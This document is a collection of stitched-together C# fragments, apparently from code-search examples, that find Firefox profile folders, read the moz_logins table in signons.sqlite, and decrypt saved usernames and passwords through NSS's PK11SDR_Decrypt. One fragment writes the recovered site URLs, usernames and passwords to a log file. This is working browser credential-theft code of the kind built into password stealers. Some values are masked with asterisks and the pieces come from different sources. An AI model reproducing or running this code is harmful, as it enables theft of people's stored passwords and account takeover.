public static int PK11SDR_Decrypt(ref TsecItem data, ref TsecItem result, int cx) { IntPtr pProc = GetProcAddress(_nss3, "PK11SDR_Decrypt"); var dll = (DllFunctionDelegate5)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DllFunctionDelegate5)); return(dll(ref data, ref result, cx)); }
private int PK11SDR_Decrypt(ref TsecItem data, ref TsecItem result, int cx) { var pProc = Kernel32.GetProcAddress(_nss3, "PK11SDR_Decrypt"); var dll = (Pk11SdrDecryptDelegate)Marshal.GetDelegateForFunctionPointer(pProc, typeof(Pk11SdrDecryptDelegate)); return(dll(ref data, ref result, cx)); }
public static void GetFf() { if (File.Exists(Config.Logname)) { File.Delete(Config.Logname); } StreamWriter writer = File.CreateText(Config.Logname); long keySlot = 0; string defaultPath = Environment.GetEnvironmentVariable("APPDATA") + @"\Mozilla\Firefox\Profiles"; string[] dirs = Directory.GetDirectories(defaultPath); foreach (string dir in dirs) { if (true) { string[] files = Directory.GetFiles(dir); foreach (string currFile in files) { if (true) { if (System.Text.RegularExpressions.Regex.IsMatch(currFile, "signons.sqlite")) { NSS_Init(dir); Signon = currFile; } } } } } string dataSource = Signon; new TsecItem(); var tSecDec = new TsecItem(); var tSecDec2 = new TsecItem(); var db = new SQLiteBase(dataSource); DataTable table = db.ExecuteQuery("SELECT * FROM moz_logins;"); DataTable table2 = db.ExecuteQuery("SELECT * FROM moz_disabledHosts;"); foreach (DataRow row in table2.Rows) { Log = row["hostname"].ToString(); } keySlot = PK11_GetInternalKeySlot(); PK11_Authenticate(keySlot, true, 0); foreach (DataRow Zeile in table.Rows) { string formurl = Convert.ToString(Zeile["formSubmitURL"].ToString()); Log = Log + " URL: " + formurl + " "; var se = new StringBuilder(Zeile["encryptedUsername"].ToString()); int hi2 = NSSBase64_DecodeBuffer(IntPtr.Zero, IntPtr.Zero, se, se.Length); var item = (TsecItem)Marshal.PtrToStructure(new IntPtr(hi2), typeof(TsecItem)); byte[] bvRet; if (PK11SDR_Decrypt(ref item, ref tSecDec, 0) == 0) { if (tSecDec.SecItemLen != 0) { bvRet = new byte[tSecDec.SecItemLen]; Marshal.Copy(new IntPtr(tSecDec.SecItemData), bvRet, 0, tSecDec.SecItemLen); Log = Log + "USER: "******" "; } } var se2 = new StringBuilder(Zeile["encryptedPassword"].ToString()); int hi22 = NSSBase64_DecodeBuffer(IntPtr.Zero, IntPtr.Zero, se2, se2.Length); var item2 = (TsecItem)Marshal.PtrToStructure(new IntPtr(hi22), typeof(TsecItem)); if (PK11SDR_Decrypt(ref item2, ref tSecDec2, 0) == 0) { if (tSecDec2.SecItemLen != 0) { bvRet = new byte[tSecDec2.SecItemLen]; Marshal.Copy(new IntPtr(tSecDec2.SecItemData), bvRet, 0, tSecDec2.SecItemLen); Log = Log + "PASSWORD: "******""; } writer.Close(); }
protected override void _GetCredentials(List <Credential> credentials) { if (!Directory.Exists(_defaultPath)) { return; } var dataSource = GetSignons(_defaultPath); Sqlite3.sqlite3 ppDb; if (Sqlite3.sqlite3_open(dataSource, out ppDb) == Sqlite3.SQLITE_OK) { var ppStmt = new Sqlite3.Vdbe(); if (Sqlite3.sqlite3_prepare_v2(ppDb, "SELECT * FROM moz_logins", -1, ref ppStmt, 0) == Sqlite3.SQLITE_OK) { while (Sqlite3.sqlite3_step(ppStmt) == Sqlite3.SQLITE_ROW) { var credential = new Credential(TargetTypes.Firefox); for (var col = 0; col < Sqlite3.sqlite3_column_count(ppStmt); col++) { var colName = Sqlite3.sqlite3_column_name(ppStmt, col); var columnText = Sqlite3.sqlite3_column_text(ppStmt, col); if ((colName == null) || (columnText == null)) { continue; } if ((colName == "encryptedUsername") || (colName == "encryptedPassword")) { var se = new StringBuilder(columnText); var hi2 = NSSBase64_DecodeBuffer(IntPtr.Zero, IntPtr.Zero, se, se.Length); var item = (TsecItem)Marshal.PtrToStructure(new IntPtr(hi2), typeof(TsecItem)); var tSecDec = new TsecItem(); if (PK11SDR_Decrypt(ref item, ref tSecDec, 0) == 0) { if (tSecDec.SecItemLen != 0) { var bvRet = new byte[tSecDec.SecItemLen]; Marshal.Copy(new IntPtr(tSecDec.SecItemData), bvRet, 0, tSecDec.SecItemLen); if (colName == "encryptedUsername") { credential.Username = Encoding.ASCII.GetString(bvRet); } else if (colName == "encryptedPassword") { credential.Password = Encoding.ASCII.GetString(bvRet); } } } } else if (colName == "hostname") { credential.Extra = columnText; } } //credentials->Add(credential); } Sqlite3.sqlite3_finalize(ppStmt); } Sqlite3.sqlite3_close(ppDb); } }